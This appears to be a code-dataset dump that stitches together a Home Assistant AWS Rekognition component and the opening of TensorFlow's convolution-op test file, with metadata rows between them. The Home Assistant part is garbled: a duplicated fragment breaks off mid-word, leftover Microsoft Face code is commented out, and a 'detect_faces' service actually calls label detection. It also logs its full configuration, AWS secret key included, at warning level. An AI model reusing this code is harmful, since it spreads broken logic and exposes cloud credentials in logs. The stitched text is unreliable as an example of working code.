# def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
# """Set up the Microsoft Face detection platform."""
# # api = hass.data[DATA_MICROSOFT_FACE]
# # attributes = config[CONF_ATTRIBUTES]
# attributes = 'aws_rekognition'
#
# entities = []
# for camera in config[CONF_SOURCE]:
# entities.append(AwsFaceDetectEntity(
# camera[CONF_ENTITY_ID], attributes, camera.get(CONF_NAME)
# ))
#
# async_add_devices(entities)
#
#
# class AwsFaceDetectEntity(ImageProcessingEntity):
# """Microsoft Face API entity for identify."""
#
# def __init__(self, camera_entity, attributes, name=None):
# """Initialize Microsoft Face."""
# super().__init__()
#
# self._camera = camera_entity
# self._attributes = attributes
#
# if name:
# self._name = name
# else:
# self._name = "MicrosoftFace {0}".format(
# split_entity_id(camera_entity)[1])
#
# @property
# def camera_entity(self):
# """Return camera entity id from process pictures."""
# return self._camera
#
# @property
# def name(self):
# """Return the name of the entity."""
# return self._name
#
# @asyncio.coroutine
# def async_process_image(self, image):
# """Process image.
#
# This method is a coroutine.
# """
# face_data = None
# # _LOGGER.warning("image ==> %s" % image)
# try:
# face_data = yield from client.index_faces(Image={'Bytes': image})
# _LOGGER.warning("face_data ==> %s" % face_data)
#
# except HomeAssistantError as err:
# _LOGGER.error("Can't process image on microsoft face: %s", err)
# return
#
# if face_data is None or len(face_data) < 1:
# return
#
# faces = []
# for face in face_data:
# face_attr = {}
# for attr in self._attributes:
# if attr in face['faceAttributes']:
# face_attr[attr] = face['faceAttributes'][attr]
#
# if face_attr:
# faces.append(face_attr)
#
# self.async_process_faces(faces, len(face_data))
| 30.794393 | 124 | 0.624431 |
import asyncio
import json
import logging
import os
import aiohttp
from aiohttp.hdrs import CONTENT_TYPE
import async_timeout
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.loader import get_component
import boto3
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'aws_rekognition'
DEPENDENCIES = ['camera']
CONF_REGION = 'region_name'
CONF_ACCESS_KEY_ID = 'aws_access_key_id'
CONF_SECRET_ACCESS_KEY = 'aws_secret_access_key'
SERVICE_CREATE_COLLECTION = 'CreateCollection '
SERVICE_LIST_COLLECTION = 'ListCollections '
SERVICE_DELETE_COLLECTION = 'DeleteCollection'
SERVICE_DETECT_FACE = 'DetectFaces'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Optional(CONF_REGION, default="us-east-1"): cv.string,
vol.Required(CONF_ACCESS_KEY_ID): cv.string,
vol.Optional(CONF_SECRET_ACCESS_KEY): cv.string
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
entity_id = 'aws_rekognition.last_message'
_LOGGER.warning(config[DOMAIN])
face = AwsFace(hass, config[DOMAIN].get(CONF_ACCESS_KEY_ID), config[DOMAIN].get(CONF_SECRET_ACCESS_KEY),
config[DOMAIN].get(CONF_REGION), entity_id)
hass.services.register(DOMAIN, 'detect_faces', face.detect_faces)
hass.services.register(DOMAIN, 'face_person', face.async_face_person)
return True
class AwsFace(object):
def __init__(self, hass, aws_access_key_id, aws_secret_access_key, region_name, entities):
self.hass = hass
self.aws_access_key_id = aws_access_key_id
self.aws_secret_access_key = aws_secret_access_key
self.region_name = region_name
self._entities = entities
_LOGGER.warning(region_name)
self.client = boto3.client(service_name='rekognition', region_name=self.region_name,
aws_access_key_id=self.aws_access_key_id,
aws_secret_access_key=self.aws_secret_access_key)
def detect_faces(self, call):
bucket = call.data.get('bucket')
fileName = call.data.get('fileName')
try:
response = self.client.detect_labels(Image={'S3Object': {'Bucket': bucket, 'Name': fileName}}, MinConfidence=75)
except Exception as e:
_LOGGER.error(e)
return False
_LOGGER.warning("response => %s" % response)
Labels = response.get('Labels', [])
self.hass.states.set(self._entities, Labels)
return response
@asyncio.coroutine
def async_face_person(self, call):
camera_entity = call.data['camera_entity']
camera = get_component('camera')
try:
image = yield from camera.async_get_image(self.hass, camera_entity)
response = self.client.detect_labels(
Image={
'Bytes': image,
}
)
_LOGGER.warning(response)
except Exception as e:
_LOGGER.error(e)
tine.
# """
f face_data is None or len(face_data) < 1:
# return
#
# faces = []
# for face in face_data:
# face_attr = {}
# for attr in self._attributes:
# if attr in face['faceAttributes']:
# face_attr[attr] = face['faceAttributes'][attr]
#
# if face_attr:
# faces.append(face_attr)
#
# self.async_process_faces(faces, len(face_data))
| true | true |
f7234398cdc1023b9eff0c5cac903bf989843930 | 122,502 | py | Python | tensorflow/python/kernel_tests/conv_ops_test.py | EricLi404/tensorflow | 23759800d89f7b5362c338d9a3fd72a6810c3e22 | [
"Apache-2.0"
] | 27 | 2019-01-02T09:36:57.000Z | 2022-02-21T06:41:51.000Z | tensorflow/python/kernel_tests/conv_ops_test.py | EricLi404/tensorflow | 23759800d89f7b5362c338d9a3fd72a6810c3e22 | [
"Apache-2.0"
] | 3 | 2019-01-23T11:01:22.000Z | 2022-02-24T02:53:31.000Z | tensorflow/python/kernel_tests/conv_ops_test.py | EricLi404/tensorflow | 23759800d89f7b5362c338d9a3fd72a6810c3e22 | [
"Apache-2.0"
] | 11 | 2019-03-02T12:42:23.000Z | 2021-02-04T12:20:10.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for convolutional operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import convolutional
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import nn_impl
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.util.compat import collections_abc
def GetShrunkInceptionShapes(shrink=10):
  """Iterator for smaller versions of convolution shapes in 2015 Inception.

  Relative to inception, each depth value is `depth // shrink`.

  Args:
    shrink: Factor to shrink each depth value by relative to Inception.

  Yields:
    Tuple (input_size, filter_size, out_size, stride, padding), the convolution
    parameters of Inception layers.
  """
  # Per-layer shape tables; entry i of each list describes the same layer.
  input_sizes = [[4, 5, 5, 1248], [4, 8, 8, 384], [4, 8, 8, 384],
                 [4, 8, 8, 2048], [4, 8, 8, 448], [4, 8, 8, 2048],
                 [4, 8, 8, 2048], [4, 8, 8, 2048], [4, 8, 8, 1760],
                 [4, 8, 8, 1760], [4, 8, 8, 1760], [4, 8, 8, 1760],
                 [4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 1248],
                 [4, 17, 17, 128], [4, 17, 17, 1248], [4, 17, 17, 224],
                 [4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 1216],
                 [4, 17, 17, 1216], [4, 17, 17, 224], [4, 17, 17, 192],
                 [4, 17, 17, 192], [4, 17, 17, 1152], [4, 17, 17, 1152],
                 [4, 17, 17, 192], [4, 17, 17, 160], [4, 17, 17, 1152],
                 [4, 17, 17, 1024], [4, 17, 17, 128], [4, 17, 17, 1024],
                 [4, 17, 17, 128], [4, 17, 17, 1024], [4, 17, 17, 128],
                 [4, 17, 17, 768], [4, 17, 17, 128], [4, 17, 17, 128],
                 [4, 17, 17, 768], [4, 17, 17, 768], [4, 35, 35, 96],
                 [4, 35, 35, 288], [4, 35, 35, 64], [4, 35, 35, 288],
                 [4, 35, 35, 256], [4, 35, 35, 48], [4, 35, 35, 256],
                 [4, 35, 35, 96], [4, 35, 35, 192], [4, 35, 35, 192],
                 [4, 35, 35, 192], [4, 73, 73, 64], [4, 73, 73, 64],
                 [4, 147, 147, 24]]
  filter_sizes = [[1, 1, 1248, 128], [1, 3, 384, 384], [3, 1, 384, 384],
                  [1, 1, 2048, 192], [3, 3, 448, 384], [1, 1, 2048, 320],
                  [1, 1, 2048, 448], [1, 1, 2048, 384], [1, 1, 1760, 384],
                  [1, 1, 1760, 192], [1, 1, 1760, 448], [1, 1, 1760, 320],
                  [3, 3, 192, 192], [3, 3, 192, 192], [1, 1, 1248, 192],
                  [3, 3, 128, 320], [1, 1, 1248, 128], [1, 3, 224, 224],
                  [3, 1, 192, 256], [1, 3, 192, 256], [1, 1, 1216, 192],
                  [1, 1, 1216, 96], [3, 1, 224, 224], [3, 3, 192, 224],
                  [1, 3, 192, 192], [1, 1, 1152, 192], [1, 1, 1152, 128],
                  [3, 1, 192, 192], [3, 3, 160, 192], [1, 1, 1152, 160],
                  [1, 1, 1024, 128], [1, 3, 128, 192], [1, 1, 1024, 160],
                  [3, 1, 128, 192], [1, 1, 1024, 256], [3, 1, 128, 128],
                  [1, 1, 768, 192], [1, 3, 128, 128], [3, 3, 128, 128],
                  [1, 1, 768, 128], [1, 1, 768, 320], [3, 3, 96, 96],
                  [3, 3, 288, 384], [3, 3, 64, 96], [1, 1, 288, 64],
                  [1, 1, 256, 64], [5, 5, 48, 64], [1, 1, 256, 48],
                  [3, 3, 96, 96], [1, 1, 192, 32], [1, 1, 192, 64],
                  [1, 1, 192, 48], [3, 3, 64, 192], [1, 1, 64, 64],
                  [1, 1, 24, 64]]
  out_sizes = [[4, 5, 5, 128], [4, 8, 8, 384], [4, 8, 8, 384],
               [4, 8, 8, 192], [4, 8, 8, 384], [4, 8, 8, 320],
               [4, 8, 8, 448], [4, 8, 8, 384], [4, 8, 8, 384],
               [4, 8, 8, 192], [4, 8, 8, 448], [4, 8, 8, 320],
               [4, 8, 8, 192], [4, 17, 17, 192], [4, 17, 17, 192],
               [4, 8, 8, 320], [4, 17, 17, 128], [4, 17, 17, 224],
               [4, 17, 17, 256], [4, 17, 17, 256], [4, 17, 17, 192],
               [4, 17, 17, 96], [4, 17, 17, 224], [4, 17, 17, 224],
               [4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 128],
               [4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 160],
               [4, 17, 17, 128], [4, 17, 17, 192], [4, 17, 17, 160],
               [4, 17, 17, 192], [4, 17, 17, 256], [4, 17, 17, 128],
               [4, 17, 17, 192], [4, 17, 17, 128], [4, 17, 17, 128],
               [4, 17, 17, 128], [4, 17, 17, 320], [4, 17, 17, 96],
               [4, 17, 17, 384], [4, 35, 35, 96], [4, 35, 35, 64],
               [4, 35, 35, 64], [4, 35, 35, 64], [4, 35, 35, 48],
               [4, 35, 35, 96], [4, 35, 35, 32], [4, 35, 35, 64],
               [4, 35, 35, 48], [4, 71, 71, 192], [4, 73, 73, 64],
               [4, 147, 147, 64]]
  strides = [
      1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1,
      1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1,
      1, 1, 1, 1, 1
  ]
  # Shrink sizes to make the test faster
  for i in input_sizes:
    i[3] //= shrink
  for f in filter_sizes:
    f[2] //= shrink
    f[3] //= shrink
  for o in out_sizes:
    o[3] //= shrink
  # pylint: disable=invalid-name
  VALID = "VALID"
  SAME = "SAME"
  # pylint: enable=invalid-name
  paddings = [
      SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
      VALID, SAME, SAME, VALID, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
      SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
      SAME, SAME, SAME, SAME, SAME, VALID, VALID, SAME, SAME, SAME, SAME, SAME,
      SAME, SAME, SAME, SAME, VALID, VALID, VALID
  ]
  for i, f, o, s, p in zip(input_sizes, filter_sizes, out_sizes, strides,
                           paddings):
    yield i, f, o, s, p
def GetTestConfigs():
  """Get all the valid tests configs to run.

  Returns:
    all the valid test configs as tuples of data_format and use_gpu.
  """
  configs = [("NHWC", False), ("NHWC", True)]
  if test.is_gpu_available(cuda_only=True):
    # "NCHW" format is only supported on CUDA.
    configs.append(("NCHW", True))
  return configs
class Conv2DTest(test.TestCase):
def _DtypesToTest(self, use_gpu):
# double datatype is currently not supported for convolution ops
# on the ROCm platform
optional_float64 = [] if test.is_built_with_rocm() else [dtypes.float64]
if use_gpu and not test_util.GpuSupportsHalfMatMulAndConv():
return [dtypes.float32] + optional_float64
else:
# It is important that float32 comes before float16 here,
# as we will be using its gradients as reference for fp16 gradients.
return [dtypes.float32, dtypes.float16] + optional_float64
def _CreateNumpyTensor(self, shape):
total_size = 1
for s in shape:
total_size *= s
return np.arange(1, total_size + 1, dtype=np.float32).reshape(shape)
  def _SetupValuesForDevice(self, tensor_in_sizes, filter_in_sizes, dilations,
                            strides, padding, data_format, dtype, use_gpu):
    """Verifies the output values of the convolution function.

    Args:
      tensor_in_sizes: Input tensor dimensions in
        [batch, input_rows, input_cols, input_depth].
      filter_in_sizes: Filter tensor dimensions in
        [kernel_rows, kernel_cols, input_depth, output_depth].
      dilations: Dilated rate: [col_dilation, row_dilation]
      strides: Stride: [col_stride, row_stride]
      padding: Padding type.
      data_format: Format of the data tensors.
      dtype: Data type for inputs and outputs.
      use_gpu: True if the operations should be run on GPU
    Returns:
      Symbolic tensor value that can be used to execute the computation
    """
    x1 = self._CreateNumpyTensor(tensor_in_sizes)
    x2 = self._CreateNumpyTensor(filter_in_sizes)
    with test_util.device(use_gpu):
      t1 = constant_op.constant(x1, shape=tensor_in_sizes, dtype=dtype)
      t2 = constant_op.constant(x2, shape=filter_in_sizes, dtype=dtype)
      # Expand strides/dilations to the full 4-d [batch, h, w, depth] form.
      strides = [1] + strides + [1]
      dilations = [1] + dilations + [1]
      # Explicit paddings: add zero padding for the batch and depth dims.
      if isinstance(padding, (list, tuple)):
        padding = [(0, 0)] + padding + [(0, 0)]
      if data_format == "NCHW":
        # Inputs above are built NHWC; transpose everything for NCHW runs.
        t1 = test_util.NHWCToNCHW(t1)
        strides = test_util.NHWCToNCHW(strides)
        dilations = test_util.NHWCToNCHW(dilations)
        if isinstance(padding, (list, tuple)):
          padding = test_util.NHWCToNCHW(padding)
      conv = nn_ops.conv2d(
          t1,
          t2,
          dilations=dilations,
          strides=strides,
          padding=padding,
          data_format=data_format)
      self.assertEqual(conv.dtype, dtype)
      # Convert the result back to NHWC so callers compare a uniform layout.
      if data_format == "NCHW":
        conv = test_util.NCHWToNHWC(conv)
      return conv
  def _CompareFwdValues(self, tensor_in_sizes, filter_in_sizes, conv_strides,
                        padding):
    """Verifies that CPU and GPU produce the same values.

    Args:
      tensor_in_sizes: Input tensor dimensions in
        [batch, input_rows, input_cols, input_depth].
      filter_in_sizes: Filter tensor dimensions in
        [kernel_rows, kernel_cols, input_depth, output_depth].
      conv_strides: [row_stride, col_stride] for the convolution;
      padding: Padding type.
    """
    x1 = np.random.rand(*tensor_in_sizes).astype(np.float32)
    x2 = np.random.rand(*filter_in_sizes).astype(np.float32)
    def _SetupVal(data_format, use_gpu):
      """Build the conv for one config, normalizing the result to NHWC."""
      with test_util.device(use_gpu):
        t1 = constant_op.constant(x1, shape=tensor_in_sizes)
        t2 = constant_op.constant(x2, shape=filter_in_sizes)
        strides = [1] + conv_strides + [1]
        if data_format == "NCHW":
          t1 = test_util.NHWCToNCHW(t1)
          strides = test_util.NHWCToNCHW(strides)
        conv = nn_ops.conv2d(
            t1, t2, strides=strides, padding=padding, data_format=data_format)
        if data_format == "NCHW":
          conv = test_util.NCHWToNHWC(conv)
        return conv
    tensors = []
    for (data_format, use_gpu) in GetTestConfigs():
      tensors.append(_SetupVal(data_format, use_gpu))
    values = self.evaluate(tensors)
    # Every configuration must agree with the first one.
    for i in range(1, len(values)):
      self.assertAllClose(values[0], values[i], rtol=1e-3, atol=1e-3)
  def _ComputeReferenceDilatedConv(self, tensor_in_sizes, filter_in_sizes,
                                   stride, dilation, padding, data_format,
                                   use_gpu):
    """Builds a reference (nn_ops.convolution) and a test (nn_ops.conv2d) op.

    Returns:
      Tuple (expected, computed) of result tensors, both converted to NHWC.
    """
    x1 = self._CreateNumpyTensor(tensor_in_sizes)
    x2 = self._CreateNumpyTensor(filter_in_sizes)
    with test_util.device(use_gpu):
      t1 = constant_op.constant(x1, shape=tensor_in_sizes)
      t2 = constant_op.constant(x2, shape=filter_in_sizes)
      # Accept either a scalar stride or a [row, col] pair.
      if isinstance(stride, collections_abc.Iterable):
        strides = list(stride)
      else:
        strides = [stride, stride]
      if data_format == "NCHW":
        t1 = test_util.NHWCToNCHW(t1)
        full_strides = [1, 1] + strides
        full_dilation = [1, 1] + dilation
      else:
        full_strides = [1] + strides + [1]
        full_dilation = [1] + dilation + [1]
      # nn_ops.convolution takes 2-d strides/dilation; nn_ops.conv2d takes the
      # full 4-d versions built above.
      expected = nn_ops.convolution(
          t1,
          t2,
          padding=padding,
          strides=strides,
          dilation_rate=dilation,
          data_format=data_format)
      computed = nn_ops.conv2d(
          t1,
          t2,
          strides=full_strides,
          dilations=full_dilation,
          padding=padding,
          data_format=data_format)
      if data_format == "NCHW":
        expected = test_util.NCHWToNHWC(expected)
        computed = test_util.NCHWToNHWC(computed)
    return expected, computed
def _VerifyDilatedConvValues(self, tensor_in_sizes, filter_in_sizes, strides,
padding, dilations, rtol=1e-4):
expected_results = []
computed_results = []
for data_format, use_gpu in GetTestConfigs():
expected, computed = self._ComputeReferenceDilatedConv(
tensor_in_sizes, filter_in_sizes, strides, dilations, padding,
data_format, use_gpu)
expected_results.append(expected)
computed_results.append(computed)
tolerance = 1e-2 if use_gpu else 1e-5
expected_values = self.evaluate(expected_results)
computed_values = self.evaluate(computed_results)
for e_value, c_value in zip(expected_values, computed_values):
tf_logging.debug("expected = %s", e_value)
tf_logging.debug("actual = %s", c_value)
self.assertAllClose(
e_value.flatten(), c_value.flatten(), atol=tolerance, rtol=rtol)
  def _VerifyValues(self,
                    tensor_in_sizes,
                    filter_in_sizes,
                    strides,
                    padding,
                    expected,
                    dilations=(1, 1),
                    gpu_only=False,
                    test_grappler_layout_optimizer=False,
                    tol=1e-5,
                    fp16_tol=1e-3):
    """Runs conv2d for every (data_format, use_gpu, dtype) configuration and
    checks each flattened result against `expected`.

    Args:
      tensor_in_sizes: Input dimensions [batch, rows, cols, depth].
      filter_in_sizes: Filter dimensions [rows, cols, in_depth, out_depth].
      strides: [row_stride, col_stride].
      padding: Padding type or explicit padding list.
      expected: Flat list of expected output values.
      dilations: [row_dilation, col_dilation].
      gpu_only: Only run GPU configurations (skips the test without a GPU).
      test_grappler_layout_optimizer: Allow Grappler to rewrite NHWC GPU convs.
      tol: Absolute/relative tolerance for non-fp16 dtypes.
      fp16_tol: Absolute/relative tolerance for fp16.
    """
    if gpu_only and not test.is_gpu_available(cuda_only=True):
      return
    tensors = []
    dilations = list(dilations)
    for (data_format, use_gpu) in GetTestConfigs():
      if gpu_only and not use_gpu:
        continue
      dtypes_to_test = self._DtypesToTest(use_gpu)
      # Additionally exercise int32, but only for plain NHWC runs.
      if not test_grappler_layout_optimizer and data_format == "NHWC":
        dtypes_to_test.append(dtypes.int32)
      for dtype in dtypes_to_test:
        result = self._SetupValuesForDevice(
            tensor_in_sizes,
            filter_in_sizes,
            dilations,
            strides,
            padding,
            data_format,
            dtype,
            use_gpu=use_gpu)
        if test_grappler_layout_optimizer and data_format == "NHWC" and use_gpu:
          # Grappler's layout optimizer will not optimize a fetch node, so
          # this identity allows Grappler to optimize the Conv2D node.
          result = array_ops.identity(result)
        tensors.append(result)
    values = self.evaluate(tensors)
    for i in range(len(tensors)):
      conv = tensors[i]
      value = values[i]
      tf_logging.debug("expected = %s", expected)
      tf_logging.debug("actual = %s", value)
      tol_to_use = fp16_tol if value.dtype == np.float16 else tol
      # Integer results must match the rounded expected values exactly.
      if np.issubdtype(value.dtype, np.integer):
        self.assertAllEqual(np.rint(expected), np.ravel(value))
      else:
        self.assertAllClose(expected, np.ravel(value), atol=tol_to_use,
                            rtol=tol_to_use)
      self.assertShapeEqual(value, conv)
      self.assertEqual(value.dtype, conv.dtype.as_numpy_dtype)
  def _VerifyExplicitPaddings(self,
                              tensor_in_sizes,
                              filter_in_sizes,
                              strides,
                              padding,
                              dilations=(1, 1),
                              test_grappler_layout_optimizer=False,
                              tol=1e-5,
                              fp16_tol=1e-3):
    """Verifies Conv2D with explicit padding generates correct values.

    It does this by comparing with Conv2D without explicit padding. This
    function assumes Conv2D without explicit padding works correctly.

    Args:
      tensor_in_sizes: Input tensor dimensions in [batch, input_rows,
        input_cols, input_depth].
      filter_in_sizes: Filter tensor dimensions in [kernel_rows, kernel_cols,
        input_depth, output_depth].
      strides: [row_stride, col_stride] for the convolution;
      padding: Explicit padding amounts.
      dilations: Dilation values
      test_grappler_layout_optimizer: If True, allow the Grappler layout
        optimizer to run, which turns NHWC Conv2Ds on the GPU to NCHW Conv2Ds.
      tol: The absolute and relative tolerance for non-fp16 dtypes.
      fp16_tol: The absolute and relative tolerance for fp16.
    """
    input_tensor = self._CreateNumpyTensor(tensor_in_sizes)
    filter_tensor = self._CreateNumpyTensor(filter_in_sizes)
    # Reference: pad the input with zeros up-front, then run a VALID conv.
    input_tensor = array_ops.pad(input_tensor, [(0, 0)] + padding + [(0, 0)])
    dilations = list(dilations)
    conv2d_result = nn_ops.conv2d(
        input_tensor,
        filter_tensor, [1] + list(strides) + [1],
        "VALID",
        dilations=[1] + dilations + [1])
    expected = list(self.evaluate(array_ops.reshape(conv2d_result, [-1])))
    # The op under test receives the explicit padding argument instead.
    self._VerifyValues(
        tensor_in_sizes,
        filter_in_sizes,
        strides,
        padding,
        expected,
        dilations,
        test_grappler_layout_optimizer=test_grappler_layout_optimizer,
        tol=tol,
        fp16_tol=fp16_tol)
  @test_util.run_in_graph_and_eager_modes
  def testConv2D1x1Filter(self):
    # A 1x1 filter reduces to a per-position matmul over the depth dimension;
    # the expected values below were computed from the 1..N ramp inputs that
    # _CreateNumpyTensor produces.
    expected_output = [
        30.0, 36.0, 42.0, 66.0, 81.0, 96.0, 102.0, 126.0, 150.0, 138.0, 171.0,
        204.0, 174.0, 216.0, 258.0, 210.0, 261.0, 312.0
    ]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[1, 1, 3, 3],
        strides=[1, 1],
        padding="VALID",
        expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DExpandedBatch(self):
tensor_in_sizes_batch = [10, 2, 3, 3]
tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
filter_in_sizes = [1, 1, 3, 3]
filter_in = self._CreateNumpyTensor(filter_in_sizes)
x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
x2 = x1.reshape(tensor_in_sizes_expanded_batch)
conv1 = nn_ops.conv2d(
x1,
filter_in,
strides=[1, 1],
padding="VALID")
conv2 = nn_ops.conv2d(
x2,
filter_in,
strides=[1, 1],
padding="VALID")
self.assertEqual(conv1.shape, tensor_in_sizes_batch)
self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
self.assertAllEqual(
conv1,
self.evaluate(conv2).reshape(conv1.shape))
@test_util.run_in_graph_and_eager_modes
def testConvolutionClass2DExpandedBatch(self):
tensor_in_sizes_batch = [10, 2, 3, 3]
tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
filter_in_sizes = [1, 1, 3, 3]
filter_in = self._CreateNumpyTensor(filter_in_sizes)
x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
x2 = x1.reshape(tensor_in_sizes_expanded_batch)
convolver1 = nn_ops.Convolution(
input_shape=x1.shape,
filter_shape=filter_in.shape,
strides=[1, 1],
padding="VALID")
self.assertEqual(convolver1.num_batch_dims, 1)
convolver2 = nn_ops.Convolution(
input_shape=x2.shape,
filter_shape=filter_in.shape,
strides=[1, 1],
padding="VALID")
self.assertEqual(convolver2.num_batch_dims, 2)
conv1 = convolver1(x1, filter_in)
conv2 = convolver2(x2, filter_in)
self.assertEqual(conv1.shape, tensor_in_sizes_batch)
self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
self.assertAllEqual(
conv1,
self.evaluate(conv2).reshape(conv1.shape))
@test_util.run_in_graph_and_eager_modes
def testConvolutionWith2SpatialDimensionsAndExpandedBatch(self):
tensor_in_sizes_batch = [10, 2, 3, 3]
tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
filter_in_sizes = [1, 1, 3, 3]
filter_in = self._CreateNumpyTensor(filter_in_sizes)
x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
x2 = x1.reshape(tensor_in_sizes_expanded_batch)
conv1 = nn_ops.convolution(
x1,
filter_in,
strides=[1, 1],
padding="VALID")
conv2 = nn_ops.convolution(
x2,
filter_in,
strides=[1, 1],
padding="VALID")
self.assertEqual(conv1.shape, tensor_in_sizes_batch)
self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
self.assertAllEqual(
conv1,
self.evaluate(conv2).reshape(conv1.shape))
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Filter2x1Dilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2DEmpty(self):
expected_output = []
self._VerifyValues(
tensor_in_sizes=[0, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[0, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
strides=[1, 1],
dilations=[2, 1],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Filter(self):
# The outputs are computed using third_party/py/IPython/notebook.
expected_output = [2271.0, 2367.0, 2463.0, 2901.0, 3033.0, 3165.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
dilations=[1, 2],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2D1x2Filter(self):
# The outputs are computed using third_party/py/IPython/notebook.
expected_output = [
231.0, 252.0, 273.0, 384.0, 423.0, 462.0, 690.0, 765.0, 840.0, 843.0,
936.0, 1029.0
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 2, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D1x2FilterDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 2, 3, 3],
strides=[1, 1],
dilations=[2, 1],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterStride2(self):
expected_output = [2271.0, 2367.0, 2463.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[2, 2],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterStride2Same(self):
expected_output = [2271.0, 2367.0, 2463.0, 1230.0, 1305.0, 1380.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[2, 2],
padding="SAME",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterStride1x2(self):
expected_output = [58.0, 78.0, 98.0, 118.0, 138.0, 158.0]
self._VerifyValues(
tensor_in_sizes=[1, 3, 6, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[1, 2],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSmallerThanStrideValid(self):
expected_output = [65, 95, 275, 305]
self._VerifyValues(
tensor_in_sizes=[1, 7, 7, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[3, 3],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSmallerThanStrideSame(self):
self._VerifyValues(
tensor_in_sizes=[1, 3, 3, 1],
filter_in_sizes=[1, 1, 1, 1],
strides=[2, 2],
padding="SAME",
expected=[1, 3, 7, 9])
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[1, 1, 1, 1],
strides=[2, 2],
padding="SAME",
expected=[1, 3, 9, 11])
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[3, 3],
padding="SAME",
expected=[44, 28, 41, 16])
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSize(self):
self._VerifyValues(
